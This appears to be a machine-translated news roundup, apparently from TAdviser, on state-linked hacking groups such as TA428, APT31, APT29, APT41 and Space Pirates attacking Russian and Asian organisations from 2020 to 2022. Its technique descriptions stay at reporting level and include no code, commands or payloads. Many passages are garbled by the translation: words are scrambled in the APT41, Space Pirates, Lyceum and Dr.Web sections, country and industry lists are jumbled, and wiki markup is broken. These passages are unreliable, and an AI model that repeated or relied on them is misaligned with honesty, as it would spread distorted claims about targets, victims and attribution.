Attacks by Chinese hackers on Russian defense institutions revealed

On August 8, 2022, Kaspersky Lab reported on the activities of the Chinese-language cyber group TA428, which, according to experts, attacks defense enterprises and government agencies in Russia, Eastern Europe and Afghanistan.

It is reported that hackers are using new modifications of previously known backdoors as part of targeted attacks. In some cases, the attackers managed to completely seize the IT infrastructure. To do this, they used well-prepared phishing emails. They contained internal information that was not available in public sources at the time of its use by cybercriminals, including F.I.O. employees working with confidential information, and internal code names of projects.

Attacks by Chinese hackers towards Russia revealed

Microsoft Word documents with malicious code exploiting the CVE-2017-11882 vulnerability were attached to phishing emails. It allows the malware to gain control of the infected system without additional actions from the user, the user is not even required to enable macro execution.

As the main tool for developing the attack, attackers used the Ladon utility with the ability to scan the network, search and exploit vulnerabilities, and steal passwords. At the final stage, they seized the domain controller and then gained full control over the workstations and servers of interest to the attackers of the organization.

Having received the necessary rights, the attackers proceeded to search and download files containing confidential data to their own, servers deployed in different countries. These same servers were used to control malware. ON

File:Aquote1.png
Targeted phishing remains one of the most pressing threats to industrial enterprises and government agencies. The series of attacks that we discovered is not the first, apparently, in a malicious campaign, "said Vyacheslav Kopeitsev, senior expert at Kaspersky ICS CERT.[12]
File:Aquote2.png

APT31 cyber group attacks Russian fuel and energy complex and media

In April 2022, PT Expert Security Center specialists from Positive Technologies identified an attack on a number of Russian organizations (media and energy companies) using a malicious document during daily threat monitoring. Representatives of Positive Technologies reported this to TAdviser on August 4, 2022.

An analysis malware (HVE) used by attackers showed that a group of APT31 was behind these attacks. Both campaigns recorded identical fragments of code that receives information about network adapters and collects data about an infected system, the stubs in the documents had a clear similarity, and were used to control malware. cloudy servers

The appearance of a malicious document

A study of the tools revealed the use of the Yandex.Disk service by attackers as a control server (used by attackers to communicate with controlled systems in the victim's network). As Daniil Koloskov, an expert at Positive Technologies, explained, APT31 used a popular cloud service, including to make traffic look like legitimate.

File:Aquote1.png
"Previously, this group similarly used the Dropbox cloud service. A similar technique for bypassing network defenses using a legitimate service was also used by the TaskMasters group in its Webdav-O HPE, "added the Positive Technologies expert.
File:Aquote2.png

About digitally signing a legitimate executable file

Copies of the studied HPE date from November 2021 to June 2022. All of them contain legitimate files, the main task of which is to transfer control to the malicious library using, for example, the Side-Loading DLL technique (attackers can execute their own malicious payloads by loading DLLs) and generate an initializing package that is sent to the control server. A significant part of the identified legitimate executable files is any component of Yandex.Browser and is signed with a valid digital signature.

According to Positive Technologies, during the analysis, two new varieties of malware were identified, which were called YaRAT (since it uses Yandex.Disk as a control server plus it has RAT functionality (from the English Remote administration tool, remote administration or control tool) and Stealer0x3401 (according to the constant used in obfuscation (a way to make it difficult to analyze the code or modify it when decompiling) encryption). In the case of YaRAT, the Yandex.Browser installer signed with a valid digital signature of Yandex (or its portable version) was used as a legitimate file vulnerable to Side-Loading DLL. The malware Stealer0x3401 used the legitimate binary file dot1xtray.exe, which loads the malicious library msvcr110.dll.

File:Aquote1.png
"In 2021, APT31 's activities were noted by us in Mongolia, Russia, the United States and other countries," said Daniil Koloskov. - The attacks we discovered this year have similar techniques for infection and consolidation, numerous intersections within the code, as well as similar artifacts of the compilation tools used. All this allows us to conclude that the group we studied is still functioning and can continue attacks on organizations in Russia. "
File:Aquote2.png

According to Daniil Koloskov, malware using Yandex.Disk as a control server is extremely difficult to detect by network interaction. In fact, this is the usual legitimate traffic between the client and the service. These malware can only be detected in dynamics using monitoring tools, including antivirus technologies.

File:Aquote1.png
"It is important to work proactively - to tell employees about digital hygiene measures and the phishing techniques used by attackers. In addition, it is advisable to have a separate address in the company, where employees will be able to send samples of suspicious letters received and report them to specialists in. INFORMATION SECURITY Of course, you need to use antivirus products, sandboxes and EDR/XDR class systems to detect and respond to threats, "the expert concluded.
File:Aquote2.png

Recent vulnerability 0-day in Microsoft Office is already exploited by Chinese APT group

The recent 0-day vulnerability Microsoft Office is already being exploited. the Chinese hackers This became known on June 1, 2022. More. here

Cyber ​ ​ group, attacking the public sector, electricity and aerospace industry in Russia discovered

On May 17, 2022, the company Positive Technologies announced that its expert center (safety PT Expert Security Center, PT ESC) had discovered another cybercriminal grouping. Russia malefactors attacked In at least five organizations, in - Georgia one, and the exact number of victims in is still Mongolia unknown. Among the goals attacking identified by Positive Technologies specialists state institutions are enterprises from aviation space and industries electrical power.

Space Pirates Key Links to Known APT Groups, HVE Families, and Network Infrastructure Fragments

According to the data obtained, the previously unknown APT group has been operating since at least 2017, its key interests are espionage and theft of confidential information. Positive Technologies experts gave the group the name Space Pirates in the direction of the first attack they identified on the aerospace sector and the line of P1Rat that the attackers used in PDB tracks.

For the first time, the expert center recorded traces of the group's activity at the end of 2019, when one Russian aerospace enterprise received a phishing letter with previously unreported malware. Over the next two years, PT ESC specialists identified four more domestic companies (two of them with state participation) that were compromised using the same HPE and network infrastructure.

According to Positive Technologies experts, at least two Space Pirates attacks in Russia have achieved their goals. In the first case, attackers gained access to at least 20 servers on the corporate network, where they were present for about 10 months. During this time, they stole more than 1,500 internal documents, as well as the data of all employee accounts in one of the network domains. In the second, the attackers managed to gain a foothold in the company's network for more than a year, obtain information about the computers included in the network and install their HPE on at least 12 corporate nodes in three different regions.

Of particular interest is the Space Pirates toolkit, which consists of unusual bootloaders (in the cases studied, they contained decoys with Russian text) and previously undescribed backdoors such as MyKLoadClient, BH_A006 and Dead RAT.

File:Aquote1.png
"Malware of its own development is specific, so they can be used to calculate the involvement of Space Pirates in a particular cyber attack. For example, in the backdoor, which we called Deed RAT, a non-standard method of transferring control to a shellcode is implemented. It is the shellcode that allows attackers to obtain administrator rights on an infected computer, "-

told Alexey Zakharov, senior specialist of the threat research department of information security Positive Technologies.
File:Aquote2.png

Space Pirates also has a well-known HPE in its arsenal: PlugX backdoors, PoisonIvy, s, Zupdax and the public ReVBShell shell. Also, attackers use the Royal Road RTF (or 8.t) builder and the modified PcShare backdoor, found mainly hackers the Asian in the environment of origin,to files and the language is often used in resources, SFX archives and paths to PDB Chinese. Malwares most often distributed using the target, phishing that is, the group always knows exactly who is attacking.

After studying the activities of the APT group, the company's experts also found a large number of intersections with previously known activity, which researchers associate with the groups Winnti (APT41), Bronze Union (APT27), TA428, RedFoxtrot, Mustang Panda and Night Dragon. The likely reason, according to Positive Technologies experts, lies in the exchange of tools between groups. This is a common occurrence for APT groups in the Asian region.

File:Aquote1.png
"In one of the investigations, we observed on infected computers the activity of not only the Space Pirates group, but also TA428, and on the network infrastructure in another attack, we traced the connection between Zupdax and the RemShell Trojan attributed to TA428. This allows us to argue that Space Pirates and TA428 can join forces and share tools, network resources and access to infected systems, "-

comments Denis Kuvshinov, Head of Threat Research at Information Security Positive Technologies.
File:Aquote2.png

The Positive Technologies Security Expert Center continues to monitor the activity of Space Pirates and its connections with other APT groups.

Russian hackers launched a large-scale targeted phishing campaign

On May 3, 2022, it became known that the Russian hackers they had launched a large-scale targeted phishing campaign.

In mid-January 2022, Mandiant specialists discovered a targeted phishing campaign launched by the Russian group APT29. Attack was directed at diplomats and government organizations. Previously, the group worked together with APT28, participated in the hacking of the Democratic National Committee, and in the wave of attacks aimed at the presidential election USA in 2016. In a recent hacker campaign revealed by Mandiant, phishing messages sent from hacked email boxes from embassies in different countries became an attack tool. Civil servants used Atlassian Trello, DropBox and cloud services as part of their C&C infrastructure.

Experts observed several waves of attacks between January 2022 and March 2022.

Timeline of the 2022 phishing campaign

{{quote 'ART29 targeted large lists of recipients, most of them public contact persons. 'said an analysis published by Mandiant. Phishing emails used the harmful HTML ROOTSAW dropper, which uses the HTML Smuggling technique to deliver an infected IMG or ISO file to the victim's system. }}

After opening the attached file, ROOTSAW writes data to disk in IMG or ISO format. The image contains a Windows shortcut (LNK) and a malicious DLL. When you click on an LNK file, a malicious DLL is executed. To deceive the victim and force the file to run, attackers use a fake icon.

File:Aquote1.png
BEATDROP is written in C and uses Trello to create a C&C server. Only after starting, the bootloader immediately creates a copy of its ntdll.dll library in the device's memory for executing shellcode inside its own process. BEATDROP creates a suspended thread with RtlCreateUserThread pointing to NtCreateFile - specified in the report. Then the bootloader scans the system to obtain the user name, computer and IP address. From the collected information, a victim ID is created, which BEATDROP uses to store victim data and send malicious packets from the C&C server. Having created an ID, BEATDROP makes a request to Trello and determines whether the victim's account was hacked earlier.
File:Aquote2.png

Experts also reported that APT29 replaced BEATDROP with BEACON. This bootloader is based on Cobalt Strike and implements the capabilities of the backdoor, including recording the keyboard, taking screenshots, collecting and extracting various data, scanning ports and much more.

Entrenched in the desired network, the group quickly tries to elevate privileges. Sometimes hackers managed to obtain domain administrator rights in less than 12 hours after a phishing attack.

Having gained access, attackers conduct extensive reconnaissance of nodes and active directory environments. APT29 has also been seen conducting intelligence on hosts to collect credentials.

During this phishing campaign, the APT29 group used several families of malware, including BEATDROP and BOOMMIC bootloaders, the ROOTSAW dropper HTML file, and the BEACON backdoor[13].

Hacker groups cash in on the conflict in Ukraine

In mid-March 2022, at least three different APT groups from around the world launched targeted phishing campaigns, taking advantage of the military conflict in Ukraine as bait for distributing malware and stealing confidential information. This became known on April 4, 2022.

Campaigns by El Machete, Lyceum and SideWinder groups target a variety of sectors, including the energy, financial and state sectors in Nicaragua, Venezuela, Israel, Saudi Arabia and Pakistan.

Attackers use decoys in the form of official-looking documents, news articles or even job ads, depending on the goals and region. According to information security experts at Check Point Research, many decoy documents use malicious macros or pattern embedding in order to gain a foothold on systems in certain organizations, and then launch malicious attacks and install a Trojan for open source remote access Loki.Rat.

One of the campaigns is organized by the Iranian the APT group Lyceum. Hackers used emails in their attacks purporting to tell the Russian of "war crimes on." To Ukraine The letters are actually installed on the victim's system by.NET and bootloaders, Go (Golang) which are then used to deploy the backdoor from a remote location. servers

Another example is SideWinder, supposedly operating in support of political interests. In India this case cybercriminals , they used a malicious document to exploit the Equation Editor vulnerability in (Microsoft Office CVE-2017-11882) and further spread malicious ON information theft[14]

Anonymous hackers hacked into the sites of major Russian media

On February 28, 2022, the sites of RBC, Forbes, TASS, the newspapers Izvestia, Kommersant, as well as several other publications were hacked. On the main page of each of them there was a message from hackers calling for an end to the special operation in Ukraine.

A message with the emblem of the group began to appear on the websites of publications at about 14:00 Moscow time. Media sites are either not downloaded, or users see a message from hackers with a call. The TAdviser journalist was convinced of this.

Anonymous hackers hacked into the sites of major Russian media

The banner is a call to "stop the madness." The link sewn into it leads to a video about the allegedly dead Russian soldiers in Ukraine. The message ends with the words:

File:Aquote1.png
Caring journalists of Russia
File:Aquote2.png

File:Aquote1.png
The official website of our agency was hacked and hacked. The attackers posted information on it that is not true. The editorial board of TASS has nothing to do with this statement, the news agency said in a statement.
File:Aquote2.png

They also noted that in recent days the TASS website has been under constant massive hacker attacks. By February 28, 2022, to restore the resource's performance, the agency's Department of Corporate Communications said.

Earlier in February 2022, hackers from Anonymous declared a "cyber war" against Russia over a special operation.

File:Aquote1.png
The Anonymous team is officially waging cyber warfare against the Russian government, the hackers said in a statement.
File:Aquote2.png

2021

Group-IB studied the malicious campaigns of a pro-state hacker group APT41

On August 18, 2022, Group-IB published a study on the activity of the pro-state hacker group APT41. According to Group-IB Threat Intelligence estimates for 2021, attackers were able to gain access to at least 13 organizations around the world. As part of malicious campaigns, in addition to using interesting techniques, it was possible to find artifacts left by attackers that indicate their origin. Special attention in the report is paid to the analysis of the "working days" of the group.

The pro-state hacker group APT41 (ARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon), attacks whose goals are both cyber espionage financial and benefit, has been active since at least 2007. Analysts at Group-IB Threat Intelligence identified 4 malicious APT41 campaigns conducted in 2021, which geographically covered,,, and USA Taiwan. India Vietnam China The target industries are steel, public sector production,,,, public health logistic hotel organizations educational , as well as media and airlines. According to Group-IB, to data there were 13 confirmed victims of the APT41 for 2021, but their real number can be much greater.

File:Aquote1.png
According to the study, 2021 was quite intense for attackers from APT41, "said Group-IB Threat Intelligence analyst. - As a result of an analysis of the tools and indicators of compromise we discovered, we were able to identify malicious activity and warn commercial and government organizations about upcoming or already committed attacks APT41 so that they could take the necessary steps to protect or search for traces of compromise of their networks. In total, in 2021, we proactively sent more than 80 such notifications related to APT41.
File:Aquote2.png

Of the intelligence tools in the campaigns investigated, the group used the utilities Acunetix, Nmap, SQLmap, OneForAll, subdomain3, subDomainsBrute, Sublist3r. Traditionally, attackers from APT41 are credited with phishing exploiting various vulnerabilities, including Proxylogon, watering hole, or attacks on, as the initial penetration vector. supply chains However, in the Group-IB-observed campaigns, attackers infiltrated target systems using SQL injections for websites using the public SQLmap tool. In some organizations, the group gained access to the command shell of the target server, in others - access databases information to accounts, employee lists, as well as passwords in pure and hashed form. As a result of such SQL injections, the attackers managed to penetrate the victims' networks in half of the cases - 43 out of 86 websites were vulnerable.

As Group-IB found out, to download and execute malicious code on infected devices, attackers used a unique method of dividing the payload, which had not previously been encountered by researchers, as a customized Cobalt Strike Beacon tool. After compilation, it was encoded in Base64, and then divided into exactly 775 characters and added to the text file with a certain command. To write the entire payload to a file, in one of the observed Group-IB cases, attackers needed 154 iterations of this action. The same non-standard method of dividing the payload was found in the network of another organization, where attackers decided to divide the code into blocks of 1024 characters. It took 128 iterations for them to record the payload in full without attracting attention.

File:Aquote1.png
Despite the protection of the CloudFlare cloud service, which hides the real addresses of servers, the Threat Intelligence system has identified the backends of APT41 servers, which allows us to monitor the malicious infrastructure of attackers and quickly block their servers, add to Group-IB.
File:Aquote2.png

An important find of Cobalt Strike's work discovered by Group-IB is the use of liseners with custom SSL certificates. They are needed to accept the connection from the payload, to communicate bots with the command center. In this case, APT41 used unique SSL certificates that mimic Microsoft, Facebook and Cloudflare. According to Group-IB, servers with such certificates began to appear from the beginning of 2020, and their number at the end of 2021 was 106. This means that researchers have noticed more than 100 Cobalt Strike servers that are used only by this group of attackers. Most of them are no longer active. All attacker infrastructure data and compromise indicators are automatically sent to the Group-IB Managed XDR system as part of a single Unified Risk Platform, which allows you to detect threats and detect cyber attacks at an early stage.

By investigating malicious APT41 campaigns dating back to 2021, analysts at Group-IB Threat Intelligence managed to align all time stamps of attackers under UTC + 8. This made it possible to establish that the main time of the group begins at 9 am and ends closer to 7 pm. In the time zone of the attackers are a number of countries, including China, Malaysia, Singapore, partly Russia and Australia.

As attribution elements, the report lists mainly the Chinese IP-addresses for accessing Cobalt Strike servers. It also notes the use of Chinese characters on the workstations from which the attacks were carried out. Interestingly, the researchers noticed the use of a specific Pinyin format for the name of directories (Pinyin is a recording of Chinese sounds in Latin).

APT attack on telecommunications company in Kazakhstan investigated

In October 2021, Dr.Web one the Kazakhstan telecommunication of the companies turned to "" with suspicion of malware presence in the corporate network. During the initial inspection, backdoors were found that were previously used only in the target ones. attacks Doctor Web announced this on March 24, 2022. During the investigation, it was possible to establish that the compromise of internal servers companies began back in 2019. For several years, the main tools of attackers have been Backdoor.PlugX.93 and BackDoor.Whitebird.30, Fast Reverse Proxy (FRP) utilities, and RemCom.

Thanks to the error hackers , we got the opportunity to study the lists of victims, and also found out what backdoor management tools were used. Based on the obtained information , we can conclude that the hacker group specialized in compromising mail servers the Asian companies with an established one. ON Microsoft Exchange However, there are victims from others, including countries:

The logs collected together with the control server included victims infected from August 2021 to early November of the same year. However, in some cases, the BackDoor.Whitebird.30 was installed not only on a server with Microsoft Exchange, but also on domain controllers.

Based on the tools, methods and infrastructure used, it was concluded that the hacker group Calypso APT is behind the attack.

The control server for the BackDoor.Whitebird.30 is called Remote Rover. It allows you to remotely launch applications, update the configuration of the backdoor, as well as download and download files. In addition, you can use the command shell using Remote Rover.

This is how the management server interface looks like:

Image:Remote rover.png

The Remote Rover was accompanied by a CFG\default.ini configuration file with the following content: E:\个人专用\自主研发远程\2021\RR\配置备份\telecom.cfg OneClock.exe

If you translate the content from Chinese into English, you can get the following path: E:\personal use\Independent research and development remote\2021\RR\Configuration backup\telecom.cfg

Detailed technical descriptions of detected malware are found in the PDF version of the study and in the Dr.Web virus library.

  • BackDoor.Siggen2.3622
  • BackDoor.PlugX.93
  • BackDoor.Whitebird.30
  • Trojan.Loader.891
  • Trojan.Loader.896
  • Trojan.Uacbypass.21
  • Trojan.DownLoader43.44599

During the investigation of the targeted attack virus , Dr.Web analysts found and described several backdoors and. trojans Attackers managed to remain unnoticed as long as they did in other incidents related to targeted attacks. The hacker group compromised the telecommunications company's network more than two years ago.

Iranian APT groups began to attack the IT sector more often

Iranian APT groups began to attack the IT sector more often. This became known on November 19, 2021.

Most of the attacks target Indian companies, as well as several companies in Israel and the United Arab Emirates.

According to information security experts from the Microsoft Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU), this activity is part of a more extensive espionage campaign to compromise objects of interest to the Iranian regime. The tech giant sent about 1.6 thousand notifications to more than 40 IT companies, warning of hacking attempts coordinated by Iranian APT.

Most of the attacks target Indian IT service companies, as well as several companies based in Israel and the United Arab Emirates. According to Microsoft, two Iranian hacker groups tracked as DEV-0228 and DEV-0056 successfully hacked the networks of IT companies in Israel and Bahrain in July and September 2021.

In July 2021, a group of DEV-0228 hacked the systems of one Israeli IT company that provides business management software. DEV-0228 used access to the IT company to expand its attacks and compromise subsequent customers in the defense, energy and legal sectors in Israel.

In September, DEV-0056 hacked the email accounts of a Bahraini IT company that works with clients of the Bahraini government. DEV-0056 has also compromised various accounts with a partially government-owned organization in the Middle East that provides information and communications technology for the defense and transport sectors. DEV-0056 was in the organization's network at least until October 2021[15].

A third of Russian companies were targeted

On November 9, 2021, Positive Technologies announced that according to a study it conducted, only one in five organizations uses solutions that can actually detect cybercriminals on the network to protect. At the same time, there has been a tendency to identify complex attacks using complex solutions.

Positive Technologies conducted an anonymous survey among information security specialists of companies from nine industries: financial, industrial, public sector, fuel and energy complex, education, telecommunications, healthcare, media and IT. In each area, organizations were found that were subjected to targeted attacks. Most often, financial companies became victims - 44% of cases, enterprises of the fuel and energy complex were in second place - 33%, state institutions close the top three - 29% of cases.

Most often, financial institutions suffered from targeted attacks

Most targeted attacks targeted a specific company, industry, or group of individuals; as a rule, such attacks are carried out after preliminary reconnaissance and collection of information about the victim. These attacks can cause tangible damage and directly affect the work of the organization, including financial results.

According to information security experts, the main goal of hackers during an attack on their companies is to steal valuable information

Respondents noted that as a result of targeted attacks, they most often faced consequences such as simple infrastructure, disrupting business processes and destroying or changing data.

The main consequence of cyber attacks, according to the survey, is simple infrastructure

At the same time, most organizations are practically not protected from such threats: they use basic protection tools, some do not even have antiviruses. There are classes of solutions that focus on detecting an attacker on the network only in every fifth company: sandboxes (Sandbox) that check files in an isolated virtual environment, 28% of respondents have, deep traffic analysis systems (NTA) - 27%. Only 15% of respondents use specialized complex solutions.

In the coming years, companies plan to implement systems for deep analysis of NTA and NDR traffic, as well as comprehensive solutions for protecting against target attacks

According to the results of the study, Positive Technologies experts see positive shifts: companies understand the need to improve the level of security and plan to expand their arsenal of protective equipment.

File:Aquote1.png
"The survey helped us find out how protected an organization is from targeted attacks in different areas, as well as better understand trends in the use of protection tools. We learned that one in five organizations intends to start using the NTA system and comprehensive solutions to protect against targeted attacks. This means that their ability to protect themselves from such threats will increase. Interest in the MITRE ATT&CK matrix is also growing. And if there is a need, it would be advisable to adapt this matrix to the needs of the Russian market, "-

says Natalia Kazankova, senior product marketing manager at Positive Technologies.
File:Aquote2.png

The study also revealed that 39% of specialists from IT companies plan to purchase a sandbox to detect complex threats. Industry representatives are going to purchase information security event monitoring systems - SIEM (40%), deep traffic analysis - NTA (36%), file verification in an isolated virtual environment - Sandbox (36%). In the financial industry, 40% of organizations will strengthen protection against targeted attacks using end-to-end solutions, and 27% will use solutions to protect EDR endpoints and NGFW firewalls.

According to the survey, 67% of specialists either already use database MITRE ATT&CK, developed and supported by MITRE based on real-world analysis, APT attacks or plan to use it in their work. With the help of this list of tactics structured in the form of a visual table, for each of which possible techniques are indicated, information security specialists can track information about current threats, build hypotheses for their proactive detection and effectively protect their companies.

Three Chinese APT groups attacked large telecommunications companies

On August 3, 2021, it became known that a team of cybersecurity researchers Cybereason Nocturnus discovered three malicious cyber espionage campaigns aimed at hacking the networks of large telecommunications companies. Presumably, the attacks are carried out in the interests of China.

The malicious campaign, collectively called DeadRinger, targets companies in Southeast Asia. The attacks are orchestrated by three cybercriminal groups (APTs) allegedly linked to the Chinese government, experts said. This conclusion is based on a comparison of tactics and methods with other well-known Chinese APTs.

The first cyber operation is allegedly related to APT Soft Cell. In a second operation called Naikon, organized at the end of 2020, telecommunications companies were attacked. As the researchers suggest, Naikon may be associated with the military bureau of the People's Liberation Army of China (PLA). The third cyber operation was organized in 2017 by the APT27 (also known as Emissary Panda). Criminals used a backdoor used to compromise Microsoft Exchange servers.

Methods hackers included exploiting vulnerabilities in, Microsoft Exchange Server installing the China Chopper web shell, using Mimikatz to steal credentials, data creating Cobalt Strike beacons and backdoors to connect to C&C.to the server

In each wave of cyber attacks, the target of criminals was cyber espionage by collecting confidential, information compromising important business assets, such as those servers billing containing Call Detail Record (CDR) data, as well as key network components, including controllers, domain web servers and Microsoft Exchange servers.

In some cases, groups could simultaneously be in the same compromised environment. However, it is unclear whether they worked independently or were all under the leadership of a specific grouping[16].

A series of large-scale cyber attacks on Russian government bodies has been identified

A subsidiary of Rostelecom National provider cyber security Technology, Rostelecom-Solar together NCCCI with the (National computer Incident Coordination Center established) FSB of Russia , identified a series of targeted attacks professional cyber groups on the Russian federal executive authorities. Rostelecom-Solar announced this on May 12, 2021. The main goal was hackers to completely compromise and steal IT infrastructures confidential, including information documentation from isolated segments and mail correspondence of key employees.

{{quote 'author=said Nikolay Murashov, Deputy Director of the National Coordination Center for Computer Incidents (NCCC). |

Based on the complexity of the means and methods used by the attackers, as well as the speed of their work and the level of training, we have reason to believe that this group has resources at the level of a foreign intelligence service. These are highly qualified cybercriminals who could stay inside the infrastructure for a long time and not impersonate themselves. Thanks to joint work with Rostelecom-Solar, we were able to timely identify malicious activities and stop them. Information required to identify this threat in other information resources is sent to all State system of detection, prevention and elimination of consequences of computer attacks participants to prevent such incidents from happening again,}}

To penetrate the infrastructure, the attackers used three main attack vectors: phishing emails with malicious attachments, exploitation of web vulnerabilities and hacking of the infrastructure of contractors, information about which hackers collected, including from open sources. A thorough preliminary study preceded the preparation of phishing mailings, as indicated by the level of their development: the letters were adapted to the specifics of the activities of a particular FNIV and contained topics that correlate with the current tasks of organizations.

Having penetrated the infrastructure, the attackers collected information about the network structure and key services. In order to gain control, they sought to attack the workstations of high access IT privileges administrators and infrastructure management systems. At the same time, cybercriminals provided themselves with a fairly high level of secrecy due to the use of legitimate utilities, an undetected harmful ON and deep understanding of the specifics of the work of the means information protection established in the authorities.

After a complete compromise of the infrastructure, the goal of the attackers was to collect confidential information from all sources of interest to them: from mail servers, server-electronic document management, file servers and workstations of managers of various levels.

The identified attacks are distinguished by several characteristic features. First, developed by cybercriminals malware used to unload the collected data cloudy storages Russian companies and. Yandex VK (formerly Mail.ru Group) Hackers disguised network activity as legitimate utilities "" and Yandex Disk"Disk-O."

Secondly, at the stage of preparing for attacks, hackers clearly studied the features of the administration of one of the Russian antiviruses and were able to use its legitimate components to collect additional information about the attacked network.

All these specific features of the attack indicate that the attackers conducted thorough preliminary preparation and studied both the specifics of the activities of Russian state authorities and the features of Russian infrastructures.

{{quote 'author=noted Igor Lyapunov, Rostelecom's vice president for information security. |

Effective counteraction to such cyber groups is possible only with a combination of several factors: extensive experience in ensuring the security of government bodies, an expanded stack of technologies for detecting attacks and a strong expert team capable of 24-hour counteraction of groups,}}

2020

Group-IB recorded 7 previously unknown pro-government groups on the cyber counter map of special services

Group-IB, an international company specializing in the prevention of cyber attacks, investigated the key changes that have occurred in the field of cybercrime in the world and on November 25, 2020 shared its forecasts for the development of cyber threats for 2021. Read more here.

The outgoing year has shown that increasingly espionage is being replaced by active attempts to destroy infrastructure. Military operations are becoming more explicit, and the emphasis is shifting from espionage to destruction of infrastructure, according to the Group-IB Hi-Tech Crime Trends 2020-2021 report. The arsenal of attackers is actively replenished with tools for attacks on physically isolated networks of critical infrastructure. The obvious target of the attackers is nuclear power. If in 2019 not a single attack was recorded in the public space, then this incident occurred at the nuclear facilities of Iran and India. Another resonant attack was an attempt at sabotage in Israel, where water supply systems were targeted, in which hackers tried to change the level of chlorine. The success of this attack could have resulted in severe water shortages and civilian casualties. At the same time, pro-state groups do not lose interest in the telecommunications sector: during the analyzed period, 11 groups associated with special services showed activity here. The tasks of the attackers are still espionage of telecom operators and attempts to disable their infrastructure. In particular, DDoS attack power records were set: 2.3 TB/s and 809 million packets per second. Interception or leakage of BGP routes remains a significant problem. Nine such incidents have been publicly recorded in the past year.

On the map of the cyber defense race of the special services, the largest number of groups are concentrated in China - 23, in Iran - 8 groups, in North Korea and Russia - 4 groups, in India - 3 groups, in Pakistan and the Gaza Strip - 2 groups. Vietnam, Turkey and South Korea close the anti-rating - one group in each country.

According to the analyzed data of Group-IB, the most attacked during the reporting period was Asia the Pacific region, to which pro-government groups from North China Korea, Iran and Pakistan showed interest: a total of 34 campaigns were carried out in this region. In second place are The European countries (22 campaigns), which were mainly interested in groups from China, Pakistan, Russia and Iran. This is followed by the Middle East and: 18 Africa campaigns were conducted here, mainly by hackers from Iran, Pakistan, Turkey, China and Gaza. Russia USA and are the least attacked powers. According to the analyst cited in the report, 15 campaigns were conducted in the United States and 9 in Russia. The composition of the attackers is similar for both countries - mainly groups from China, North Korea and Iran. In Russia, one attack The Kazakhstan of the special services was recorded, the United States was also attacked by hackers from the Gaza Strip and Pakistan.

Analysts also discovered seven previously unknown APT groups, among them: Tortoiseshell (Iran), Poison Carp (China), Higaisa (South Korea), AVIVORE (China), Nuo Chong Lions (Saudi Arabia), as well as Chimera and WildPressure, whose affiliation to any country remains unspecified. In addition, the activity of six groups was revealed, which remained unnoticed for the past few years. This once again shows that do not underestimate APT groups and their sophistication, emphasized in Group-IB.

Dr.Web discovered preparations for a spy attack on Russian fuel and energy complex enterprises

On September 24, 2020, it became known that the developer of information protection tools, Doctor Web, published[17] with a study of a phishing campaign that was aimed at Russian enterprises of the fuel and energy complex. The first wave was dated April 2020, the last manifestations of activity occurred in September 2020.

"Dr.Web" discovered preparations for a spy attack on Russian enterprises of the fuel and energy complex. Photo source: ru.ihodl.com

Dr.Web is confident that we are talking about an attempt by one of the Chinese APT campaigns to attack fuel and energy complex enterprises with the aim of cyber espionage. At the same time, the quality of phishing emails was very low.

In April, documents with the.docx extension were sent to employees of a number of enterprises in the fuel and energy complex of Russia under the guise of an updated telephone directory, which uploaded two images from remote resources.

File:Aquote1.png
One of them was downloaded to the user's computer from the server news.zannews.com. It is noteworthy that the domain name is similar to the domain of the anti-corruption media center of Kazakhstan - zannews.kz. On the other hand, the domain used immediately recalled another 2015 campaign known as TopNews, which used the IceFog backdoor and Trojans management domains had a "news" substring in their names, the company said in a publication.
File:Aquote2.png

Experts also noted that when sending letters to various recipients in requests for downloading an image, different request parameters or unique image names were used. This was probably done in order to collect information to determine the "reliable" addressee, who next time will most likely open the letter. To download the image from the second server, the SMB protocol was used, which could be done to collect NetNTLM hashes from the computers of the employees who opened the received document

In June 2020, attackers began to use another domain name - sports.manhajnews.com; subdomains have manhajnews.com been used in spam mailings since at least the fall of 2019.

A campaign was also launched in June, with another document that contained information on industry development and a modified image download server.

The texts of all these letters clearly indicated that their authors are not native speakers of the Russian language and have an extremely superficial idea of ​ ​ its grammar.

Illustration: drweb.ru

For mailings, however, mailboxes on mail.ru and yandex.ru. were used.

In early September 2020, the authors of the campaign switched to more aggressive actions: the spam campaign distributed a Word document that already contained a malicious macro. His task was to deliver a simple bootloader to the victim's computer, which can receive and run shellcode from the control server. Ultimately, Dr.Web specialists identified two types of backdoors that hit the victims in this way: the previously unknown BackDoor.Siggen2.3238 and the already familiar BackDoor.Whitebird, which was previously used in attacks on a state institution in Kazakhstan.

File:Aquote1.png
An analysis of documents, malware, and the infrastructure used allows us to say with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of backdoors that are installed on victims' computers in the event of a successful attack, infection leads to at least theft of confidential information from the computers of the attacked organizations. In addition, a very likely scenario is to install specialized Trojans on local servers with a special function, such as domain controllers, mail servers, Internet gateways, etc., the publication "Dr.Web" says.
File:Aquote2.png

File:Aquote1.png
It is difficult to imagine a person in his right mind, whose letters sent out as part of these campaigns would not arouse suspicion and grin at the same time. On the other hand, attachments to such letters can be opened inadvertently, and this is the only thing, perhaps, that campaign operators could calculate this time. With all the curiosity of these attacks, the problem with attempts to hack strategic enterprises is extremely acute. And even such inept, at first glance, attacks can be an alarming sign - next time phishing messages can be written in the ideal Russian language and indicating the names, surnames and positions of real employees of the attacked organization.
File:Aquote2.png

RedCurl group attacked dozens of targets from Russia to North America to steal corporate data

On August 13, 2020, Group-IB presented an analytical report on the previously unknown hacker group RedCurl, specializing in corporate espionage. In less than 3 years, RedCurl has attacked dozens of targets from Russia to North America. The group, presumably consisting of Russian-speaking hackers, conducts carefully planned attacks on private companies in various industries using unique tools. The purpose of the attackers is documents representing trade secrets and containing personal data of employees. Corporate espionage in order to compete is a rare phenomenon on the hacker scene as of August 2020, but the frequency of attacks suggests that it is likely to become further widespread.

Victims of cyber espionage by hacker group RedCurl

Group-IB first revealed the tactics, tools and infrastructure features of the RedCurl group. A document available on the company's website provides a detailed description of the attack chain prepared by specialists from the Group-IB Computer Forensics Laboratory and data collected during the response to incidents attributed to RedCurl campaigns.

According to the company, the RedCurl group, discovered by F.A.C.C.T. Threat Intelligence experts, has been active since at least 2018. During this time, she carried out 26 targeted attacks exclusively on commercial organizations. Among them are construction, financial, consulting companies, retailers, banks, insurance, legal and travel organizations. RedCurl does not have a clear geographical reference to any region: its victims were located in Russia, Ukraine, Great Britain, Germany, Canada and Norway.

